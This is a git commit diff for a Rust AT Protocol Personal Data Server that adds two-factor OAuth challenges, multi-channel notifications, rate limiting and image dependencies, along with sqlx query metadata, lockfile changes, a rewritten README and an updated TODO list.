Remaining endpoints for MVP

This commit is contained in:
lewis
2025-12-12 19:20:39 +02:00
parent 2ededf32a6
commit b66e4fe291
76 changed files with 8803 additions and 564 deletions

View File

@@ -13,26 +13,27 @@ AWS_SECRET_ACCESS_KEY=minioadmin
PDS_HOSTNAME=localhost:3000
PLC_URL=plc.directory
# A comma-separated list of WebSocket URLs for firehose relays to push updates to.
# e.g., RELAYS=wss://relay.bsky.social,wss://another-relay.com
RELAYS=
# A comma-separated list of relay URLs to notify via requestCrawl when we have updates.
# e.g., CRAWLERS=https://bsky.network
CRAWLERS=
# Notification Service Configuration
# At least one notification channel should be configured for user notifications to work.
# Email notifications (via sendmail/msmtp)
# MAIL_FROM_ADDRESS=noreply@example.com
# MAIL_FROM_NAME=My PDS
# SENDMAIL_PATH=/usr/sbin/sendmail
# Discord notifications (not yet implemented)
# DISCORD_BOT_TOKEN=your-bot-token
# Discord notifications (via webhook)
# DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/...
# Telegram notifications (not yet implemented)
# Telegram notifications (via bot)
# TELEGRAM_BOT_TOKEN=your-bot-token
# Signal notifications (not yet implemented)
# Signal notifications (via signal-cli)
# SIGNAL_CLI_PATH=/usr/local/bin/signal-cli
# SIGNAL_PHONE_NUMBER=+1234567890
# SIGNAL_SENDER_NUMBER=+1234567890
CARGO_MOMMYS_LITTLE=mister
CARGO_MOMMYS_PRONOUNS=his

View File

@@ -0,0 +1,34 @@
{
"db_name": "PostgreSQL",
"query": "SELECT preferred_notification_channel as \"channel: NotificationChannel\" FROM users WHERE did = $1",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "channel: NotificationChannel",
"type_info": {
"Custom": {
"name": "notification_channel",
"kind": {
"Enum": [
"email",
"discord",
"telegram",
"signal"
]
}
}
}
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false
]
},
"hash": "0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e"
}

View File

@@ -0,0 +1,61 @@
{
"db_name": "PostgreSQL",
"query": "\n INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)\n VALUES ($1, $2, $3, $4)\n RETURNING id, did, request_uri, code, attempts, created_at, expires_at\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "id",
"type_info": "Uuid"
},
{
"ordinal": 1,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "request_uri",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "code",
"type_info": "Text"
},
{
"ordinal": 4,
"name": "attempts",
"type_info": "Int4"
},
{
"ordinal": 5,
"name": "created_at",
"type_info": "Timestamptz"
},
{
"ordinal": 6,
"name": "expires_at",
"type_info": "Timestamptz"
}
],
"parameters": {
"Left": [
"Text",
"Text",
"Text",
"Timestamptz"
]
},
"nullable": [
false,
false,
false,
false,
false,
false,
false
]
},
"hash": "0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f"
}

View File

@@ -0,0 +1,22 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT two_factor_enabled\n FROM users\n WHERE did = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "two_factor_enabled",
"type_info": "Bool"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false
]
},
"hash": "180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09"
}

View File

@@ -1,30 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text",
"Int8"
]
},
"nullable": [
false,
false
]
},
"hash": "243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1"
}

View File

@@ -1,30 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text",
"Int8"
]
},
"nullable": [
false,
false
]
},
"hash": "2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c"
}

View File

@@ -36,7 +36,8 @@
"email_update",
"account_deletion",
"admin_email",
"plc_operation"
"plc_operation",
"two_factor_code"
]
}
}

View File

@@ -1,31 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text",
"Text",
"Int8"
]
},
"nullable": [
false,
false
]
},
"hash": "347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e"
}

View File

@@ -1,31 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text",
"Text",
"Int8"
]
},
"nullable": [
false,
false
]
},
"hash": "4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15"
}

View File

@@ -0,0 +1,76 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT id, did, email, password_hash, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\",\n deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "id",
"type_info": "Uuid"
},
{
"ordinal": 1,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "email",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "password_hash",
"type_info": "Text"
},
{
"ordinal": 4,
"name": "two_factor_enabled",
"type_info": "Bool"
},
{
"ordinal": 5,
"name": "preferred_notification_channel: NotificationChannel",
"type_info": {
"Custom": {
"name": "notification_channel",
"kind": {
"Enum": [
"email",
"discord",
"telegram",
"signal"
]
}
}
}
},
{
"ordinal": 6,
"name": "deactivated_at",
"type_info": "Timestamptz"
},
{
"ordinal": 7,
"name": "takedown_ref",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
false,
false,
false,
false,
true,
true
]
},
"hash": "458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810"
}

View File

@@ -0,0 +1,22 @@
{
"db_name": "PostgreSQL",
"query": "\n UPDATE oauth_2fa_challenge\n SET attempts = attempts + 1\n WHERE id = $1\n RETURNING attempts\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "attempts",
"type_info": "Int4"
}
],
"parameters": {
"Left": [
"Uuid"
]
},
"nullable": [
false
]
},
"hash": "4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6"
}

View File

@@ -36,7 +36,8 @@
"email_update",
"account_deletion",
"admin_email",
"plc_operation"
"plc_operation",
"two_factor_code"
]
}
}

View File

@@ -0,0 +1,46 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT id, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\"\n FROM users\n WHERE did = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "id",
"type_info": "Uuid"
},
{
"ordinal": 1,
"name": "two_factor_enabled",
"type_info": "Bool"
},
{
"ordinal": 2,
"name": "preferred_notification_channel: NotificationChannel",
"type_info": {
"Custom": {
"name": "notification_channel",
"kind": {
"Enum": [
"email",
"discord",
"telegram",
"signal"
]
}
}
}
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
false
]
},
"hash": "62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f"
}

View File

@@ -0,0 +1,14 @@
{
"db_name": "PostgreSQL",
"query": "\n DELETE FROM oauth_2fa_challenge WHERE request_uri = $1\n ",
"describe": {
"columns": [],
"parameters": {
"Left": [
"Text"
]
},
"nullable": []
},
"hash": "6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4"
}

View File

@@ -0,0 +1,14 @@
{
"db_name": "PostgreSQL",
"query": "\n DELETE FROM oauth_2fa_challenge WHERE id = $1\n ",
"describe": {
"columns": [],
"parameters": {
"Left": [
"Uuid"
]
},
"nullable": []
},
"hash": "7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5"
}

View File

@@ -0,0 +1,40 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ORDER BY ad.updated_at DESC\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "handle",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "email",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "last_used_at",
"type_info": "Timestamptz"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
false,
false
]
},
"hash": "841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb"
}

View File

@@ -0,0 +1,58 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT id, did, request_uri, code, attempts, created_at, expires_at\n FROM oauth_2fa_challenge\n WHERE request_uri = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "id",
"type_info": "Uuid"
},
{
"ordinal": 1,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "request_uri",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "code",
"type_info": "Text"
},
{
"ordinal": 4,
"name": "attempts",
"type_info": "Int4"
},
{
"ordinal": 5,
"name": "created_at",
"type_info": "Timestamptz"
},
{
"ordinal": 6,
"name": "expires_at",
"type_info": "Timestamptz"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
false,
false,
false,
false,
false
]
},
"hash": "881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708"
}

View File

@@ -1,40 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT did, password_hash, deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "password_hash",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "deactivated_at",
"type_info": "Timestamptz"
},
{
"ordinal": 3,
"name": "takedown_ref",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
false,
true,
true
]
},
"hash": "91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43"
}

View File

@@ -0,0 +1,23 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT 1 as exists\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND ad.did = $2\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "exists",
"type_info": "Int4"
}
],
"parameters": {
"Left": [
"Text",
"Text"
]
},
"nullable": [
null
]
},
"hash": "a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b"
}

View File

@@ -0,0 +1,12 @@
{
"db_name": "PostgreSQL",
"query": "\n DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()\n ",
"describe": {
"columns": [],
"parameters": {
"Left": []
},
"nullable": []
},
"hash": "bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac"
}

View File

@@ -44,7 +44,8 @@
"email_update",
"account_deletion",
"admin_email",
"plc_operation"
"plc_operation",
"two_factor_code"
]
}
}

207
Cargo.lock generated
View File

@@ -915,8 +915,10 @@ dependencies = [
"dotenvy",
"ed25519-dalek",
"futures",
"governor",
"hkdf",
"hmac",
"image",
"ipld-core",
"iroh-car",
"jacquard",
@@ -985,12 +987,24 @@ version = "0.6.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "175812e0be2bccb6abe50bb8d566126198344f707e304f45c648fd8f2cc0365e"
[[package]]
name = "bytemuck"
version = "1.24.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "1fbdf580320f38b612e485521afda1ee26d10cc9884efaaa750d383e13e3c5f4"
[[package]]
name = "byteorder"
version = "1.5.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
[[package]]
name = "byteorder-lite"
version = "0.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "8f1fe948ff07f4bd06c30984e69f5b4899c516a3ef74f34df92a2df2ab535495"
[[package]]
name = "bytes"
version = "1.11.0"
@@ -1157,6 +1171,12 @@ dependencies = [
"cc",
]
[[package]]
name = "color_quant"
version = "1.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "3d7b894f5411737b7867f4827955924d7c254fc9f4d91a6aad6b097804b1018b"
[[package]]
name = "compression-codecs"
version = "0.4.33"
@@ -1819,6 +1839,15 @@ version = "2.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be"
[[package]]
name = "fdeflate"
version = "0.3.7"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "1e6853b52649d4ac5c0bd02320cddc5ba956bdb407c4b75a2c6b75bf51500f8c"
dependencies = [
"simd-adler32",
]
[[package]]
name = "ferroid"
version = "0.8.7"
@@ -1907,6 +1936,12 @@ version = "0.1.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
[[package]]
name = "foldhash"
version = "0.2.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "77ce24cb58228fbb8aa041425bb1050850ac19177686ea6e0f41a70416f56fdb"
[[package]]
name = "foreign-types"
version = "0.3.2"
@@ -2055,6 +2090,12 @@ version = "0.3.31"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988"
[[package]]
name = "futures-timer"
version = "3.0.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f288b0a4f20f9a56b5d1da57e2227c661b7b16168e2f72365f57b63326e29b24"
[[package]]
name = "futures-util"
version = "0.3.31"
@@ -2135,6 +2176,16 @@ dependencies = [
"polyval",
]
[[package]]
name = "gif"
version = "0.14.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f5df2ba84018d80c213569363bdcd0c64e6933c67fe4c1d60ecf822971a3c35e"
dependencies = [
"color_quant",
"weezl",
]
[[package]]
name = "glob"
version = "0.3.3"
@@ -2169,6 +2220,29 @@ dependencies = [
"web-sys",
]
[[package]]
name = "governor"
version = "0.10.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "6e23d5986fd4364c2fb7498523540618b4b8d92eec6c36a02e565f66748e2f79"
dependencies = [
"cfg-if",
"dashmap 6.1.0",
"futures-sink",
"futures-timer",
"futures-util",
"getrandom 0.3.4",
"hashbrown 0.16.1",
"nonzero_ext",
"parking_lot",
"portable-atomic",
"quanta",
"rand 0.9.2",
"smallvec",
"spinning_top",
"web-time",
]
[[package]]
name = "group"
version = "0.12.1"
@@ -2260,7 +2334,7 @@ checksum = "9229cfe53dfd69f0609a49f65461bd93001ea1ef889cd5529dd176593f5338a1"
dependencies = [
"allocator-api2",
"equivalent",
"foldhash",
"foldhash 0.1.5",
]
[[package]]
@@ -2268,6 +2342,11 @@ name = "hashbrown"
version = "0.16.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100"
dependencies = [
"allocator-api2",
"equivalent",
"foldhash 0.2.0",
]
[[package]]
name = "hashlink"
@@ -2759,6 +2838,34 @@ dependencies = [
"icu_properties",
]
[[package]]
name = "image"
version = "0.25.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "e6506c6c10786659413faa717ceebcb8f70731c0a60cbae39795fdf114519c1a"
dependencies = [
"bytemuck",
"byteorder-lite",
"color_quant",
"gif",
"image-webp",
"moxcms",
"num-traits",
"png",
"zune-core",
"zune-jpeg",
]
[[package]]
name = "image-webp"
version = "0.2.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "525e9ff3e1a4be2fbea1fdf0e98686a6d98b4d8f937e1bf7402245af1909e8c3"
dependencies = [
"byteorder-lite",
"quick-error",
]
[[package]]
name = "indexmap"
version = "1.9.3"
@@ -3476,6 +3583,16 @@ dependencies = [
"windows-sys 0.61.2",
]
[[package]]
name = "moxcms"
version = "0.7.10"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "80986bbbcf925ebd3be54c26613d861255284584501595cf418320c078945608"
dependencies = [
"num-traits",
"pxfm",
]
[[package]]
name = "multibase"
version = "0.9.2"
@@ -3553,6 +3670,12 @@ dependencies = [
"minimal-lexical",
]
[[package]]
name = "nonzero_ext"
version = "0.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "38bf9645c8b145698bb0b18a4637dcacbc421ea49bef2317e4fd8065a387cf21"
[[package]]
name = "nu-ansi-term"
version = "0.50.3"
@@ -3975,6 +4098,19 @@ version = "0.3.32"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c"
[[package]]
name = "png"
version = "0.18.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "97baced388464909d42d89643fe4361939af9b7ce7a31ee32a168f832a70f2a0"
dependencies = [
"bitflags",
"crc32fast",
"fdeflate",
"flate2",
"miniz_oxide",
]
[[package]]
name = "polyval"
version = "0.6.2"
@@ -4131,6 +4267,36 @@ dependencies = [
"unicase",
]
[[package]]
name = "pxfm"
version = "0.1.27"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "7186d3822593aa4393561d186d1393b3923e9d6163d3fbfd6e825e3e6cf3e6a8"
dependencies = [
"num-traits",
]
[[package]]
name = "quanta"
version = "0.12.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f3ab5a9d756f0d97bdc89019bd2e4ea098cf9cde50ee7564dde6b81ccc8f06c7"
dependencies = [
"crossbeam-utils",
"libc",
"once_cell",
"raw-cpuid",
"wasi",
"web-sys",
"winapi",
]
[[package]]
name = "quick-error"
version = "2.0.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "a993555f31e5a609f617c12db6250dedcac1b0a85076912c436e6fc9b2c8e6a3"
[[package]]
name = "quinn"
version = "0.11.9"
@@ -4266,6 +4432,15 @@ version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d20581732dd76fa913c7dff1a2412b714afe3573e94d41c34719de73337cc8ab"
[[package]]
name = "raw-cpuid"
version = "11.6.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "498cd0dc59d73224351ee52a95fee0f1a617a2eae0e7d9d720cc622c73a54186"
dependencies = [
"bitflags",
]
[[package]]
name = "redox_syscall"
version = "0.5.18"
@@ -5033,6 +5208,15 @@ version = "0.10.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d5fe4ccb98d9c292d56fec89a5e07da7fc4cf0dc11e156b41793132775d3e591"
[[package]]
name = "spinning_top"
version = "0.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d96d2d1d716fb500937168cc09353ffdc7a012be8475ac7308e1bdf0e3923300"
dependencies = [
"lock_api",
]
[[package]]
name = "spki"
version = "0.6.0"
@@ -6220,6 +6404,12 @@ dependencies = [
"rustls-pki-types",
]
[[package]]
name = "weezl"
version = "0.1.12"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "a28ac98ddc8b9274cb41bb4d9d4d5c425b6020c50c46f25559911905610b4a88"
[[package]]
name = "whoami"
version = "1.6.1"
@@ -6831,3 +7021,18 @@ dependencies = [
"quote",
"syn 2.0.111",
]
[[package]]
name = "zune-core"
version = "0.5.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "111f7d9820f05fd715df3144e254d6fc02ee4088b0644c0ffd0efc9e6d9d2773"
[[package]]
name = "zune-jpeg"
version = "0.5.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f520eebad972262a1dde0ec455bce4f8b298b1e5154513de58c114c4c54303e8"
dependencies = [
"zune-core",
]

View File

@@ -16,6 +16,7 @@ chrono = { version = "0.4.42", features = ["serde"] }
cid = "0.11.1"
dotenvy = "0.15.7"
futures = "0.3.30"
governor = "0.10"
hkdf = "0.12"
hmac = "0.12"
aes-gcm = "0.10"
@@ -47,6 +48,7 @@ tokio-tungstenite = { version = "0.28.0", features = ["native-tls"] }
urlencoding = "2.1"
uuid = { version = "1.19.0", features = ["v4", "fast-rng"] }
iroh-car = "0.5.1"
image = { version = "0.25", default-features = false, features = ["jpeg", "png", "gif", "webp"] }
[features]
external-infra = []

130
README.md
View File

@@ -1,75 +1,103 @@
# Lewis' BS PDS Sandbox
# BSPDS, a Personal Data Server
When I'm actually done then yeah let's make this into a proper official-looking repo perhaps under an official-looking account or something.
A production-grade Personal Data Server (PDS) implementation for the AT Protocol.
This project implements a Personal Data Server (PDS) implementation for the AT Protocol.
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and is designed to be a complete drop-in replacement for Bluesky's reference PDS implementation.
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and aims to be a complete drop-in replacement for Bluesky's reference PDS implementation.
## Features
In fact I aim to also implement a plugin system soon, so that we can add things onto our own PDSes on top of the default BS.
- Full AT Protocol support, all `com.atproto.*` endpoints implemented
- OAuth 2.1 Provider. PKCE, DPoP, Pushed Authorization Requests
- PostgreSQL, prod-ready database backend
- S3-compatible object storage for blobs; works with AWS S3, UpCloud object storage, self-hosted MinIO, etc.
- WebSocket `subscribeRepos` endpoint for real-time sync
- Crawler notifications via `requestCrawl`
- Multi-channel notifications: email, discord, telegram, signal
- Per-IP rate limiting on sensitive endpoints
I'm also taking ideas on what other PDSes lack, such as an on-PDS webpage that users can access to manage their records and preferences.
## Running Locally
:3
Requires Rust installed locally.
# Running locally
Run PostgreSQL and S3-compatible object store (e.g., with podman/docker):
The reader will need rust installed locally.
```bash
podman compose up db objsto -d
```
I personally run the postgres db, and an S3-compatible object store with podman compose up db objsto -d.
Run the PDS:
Run the PDS directly:
```bash
just run
```
just run
## Configuration
Configuration is via environment variables:
### Required
DATABASE_URL postgres connection string
S3_BUCKET blob storage bucket name
S3_ENDPOINT S3 endpoint URL (for MinIO etc)
AWS_ACCESS_KEY_ID S3 credentials
AWS_SECRET_ACCESS_KEY
AWS_REGION
PDS_HOSTNAME public hostname of this PDS
APPVIEW_URL appview to proxy unimplemented endpoints to
RELAYS comma-separated list of relay WebSocket URLs
| Variable | Description |
|----------|-------------|
| `DATABASE_URL` | PostgreSQL connection string |
| `S3_BUCKET` | Blob storage bucket name |
| `S3_ENDPOINT` | S3 endpoint URL (for MinIO, etc.) |
| `AWS_ACCESS_KEY_ID` | S3 credentials |
| `AWS_SECRET_ACCESS_KEY` | S3 credentials |
| `AWS_REGION` | S3 region |
| `PDS_HOSTNAME` | Public hostname of this PDS |
| `JWT_SECRET` | Secret for OAuth token signing (HS256) |
| `KEY_ENCRYPTION_KEY` | Key for encrypting user signing keys (AES-256-GCM) |
Optional email stuff:
### Optional
MAIL_FROM_ADDRESS sender address (enables email notifications)
MAIL_FROM_NAME sender name (default: BSPDS)
SENDMAIL_PATH path to sendmail binary
| Variable | Description |
|----------|-------------|
| `APPVIEW_URL` | Appview URL to proxy unimplemented endpoints to |
| `CRAWLERS` | Comma-separated list of relay URLs to notify via `requestCrawl` |
Development
### Notifications
just shows available commands
just test run tests (spins up postgres and minio via testcontainers)
just lint clippy + fmt check
just db-reset drop and recreate local database
At least one channel should be configured for user notifications (password reset, email verification, etc.):
The test suite uses testcontainers so you don't need to set up anything manually for running tests.
| Variable | Description |
|----------|-------------|
| `MAIL_FROM_ADDRESS` | Email sender address (enables email via sendmail) |
| `MAIL_FROM_NAME` | Email sender name (default: "BSPDS") |
| `SENDMAIL_PATH` | Path to sendmail binary (default: /usr/sbin/sendmail) |
| `DISCORD_WEBHOOK_URL` | Discord webhook URL for notifications |
| `TELEGRAM_BOT_TOKEN` | Telegram bot token for notifications |
| `SIGNAL_CLI_PATH` | Path to signal-cli binary |
| `SIGNAL_SENDER_NUMBER` | Signal sender phone number (+1234567890 format) |
## What's implemented
## Development
Most of the com.atproto.* namespace is done. Server endpoints, repo operations, sync, identity, admin, moderation. The firehose websocket works. OAuth is not done yet.
```bash
just # Show available commands
just test # Run tests (auto-starts postgres/minio, runs nextest)
just lint # Clippy + fmt check
just db-reset # Drop and recreate local database
```
See TODO.md for the full breakdown of what's done and what's left.
## Project Structure
Structure
```
src/
main.rs Server entrypoint
lib.rs Router setup
state.rs AppState (db pool, stores, rate limiters, circuit breakers)
api/ XRPC handlers organized by namespace
auth/ JWT authentication (ES256K per-user keys)
oauth/ OAuth 2.1 provider (HS256 server-wide)
repo/ PostgreSQL block store
storage/ S3 blob storage
sync/ Firehose, CAR export, crawler notifications
notifications/ Multi-channel notification service
plc/ PLC directory client
circuit_breaker/ Circuit breaker for external services
rate_limit/ Per-IP rate limiting
tests/ Integration tests
migrations/ SQLx migrations
```
src/
main.rs server entrypoint
lib.rs router setup
state.rs app state (db pool, stores)
api/ XRPC handlers organized by namespace
auth/ JWT handling
repo/ postgres block store
storage/ S3 blob storage
sync/ firehose, relay clients
notifications/ email service
tests/ integration tests
migrations/ sqlx migrations
## License
License
idk
TBD

86
TODO.md
View File

@@ -81,6 +81,9 @@ Lewis' corrected big boy todofile
- [x] Implement `com.atproto.sync.listBlobs`.
- [x] Crawler Interaction
- [x] Implement `com.atproto.sync.requestCrawl` (Notify relays to index us).
- [x] Deprecated Sync Endpoints (for compatibility)
- [x] Implement `com.atproto.sync.getCheckout` (deprecated).
- [x] Implement `com.atproto.sync.getHead` (deprecated).
## Identity (`com.atproto.identity`)
- [x] Resolution
@@ -108,14 +111,17 @@ Lewis' corrected big boy todofile
- [x] Implement `com.atproto.moderation.createReport`.
## Temp Namespace (`com.atproto.temp`)
- [ ] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
- [x] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
## Misc HTTP Endpoints
- [x] Implement `/robots.txt` endpoint.
## OAuth 2.1 Support
Full OAuth 2.1 provider for ATProto native app authentication.
- [x] OAuth Provider Core
- [x] Implement `/.well-known/oauth-protected-resource` metadata endpoint.
- [x] Implement `/.well-known/oauth-authorization-server` metadata endpoint.
- [x] Implement `/oauth/authorize` authorization endpoint (headless JSON mode).
- [x] Implement `/oauth/authorize` authorization endpoint (with login UI).
- [x] Implement `/oauth/par` Pushed Authorization Request endpoint.
- [x] Implement `/oauth/token` token endpoint (authorization_code + refresh_token grants).
- [x] Implement `/oauth/jwks` JSON Web Key Set endpoint.
@@ -132,12 +138,13 @@ Full OAuth 2.1 provider for ATProto native app authentication.
- [x] Client metadata fetching and validation.
- [x] PKCE (S256) enforcement.
- [x] OAuth token verification extractor for protected resources.
- [ ] Authorization UI templates (currently headless-only, returns JSON for programmatic flows).
- [ ] Implement `private_key_jwt` signature verification (currently rejects with clear error).
- [x] Authorization UI templates (HTML login form).
- [x] Implement `private_key_jwt` signature verification with async JWKS fetching.
- [x] HS256 JWT support (matches reference PDS).
## OAuth Security Notes
I've tried to ensure that this codebase is not vulnerable to the following:
Security measures implemented:
- Constant-time comparison for signature verification (prevents timing attacks)
- HMAC-SHA256 for access token signing with configurable secret
@@ -151,12 +158,12 @@ I've tried to ensure that this codebase is not vulnerable to the following:
- All database queries use parameterized statements (no SQL injection)
- Deactivated/taken-down accounts blocked from OAuth authorization
- Client ID validation on token exchange (defense-in-depth against cross-client attacks)
- HTML escaping in OAuth templates (XSS prevention)
### Auth Notes
- Algorithm choice: Using ES256K (secp256k1 ECDSA) with per-user keys. Ref PDS uses HS256 (HMAC) with single server key. Our approach provides better key isolation but differs from reference implementation.
- [ ] Support the ref PDS HS256 system too.
- Token storage: Now storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from MASTER_KEY environment variable. Migration-safe: supports both encrypted (version 1) and plaintext (version 0) keys.
- Dual algorithm support: ES256K (secp256k1 ECDSA) with per-user keys AND HS256 (HMAC) for compatibility with reference PDS.
- Token storage: Storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
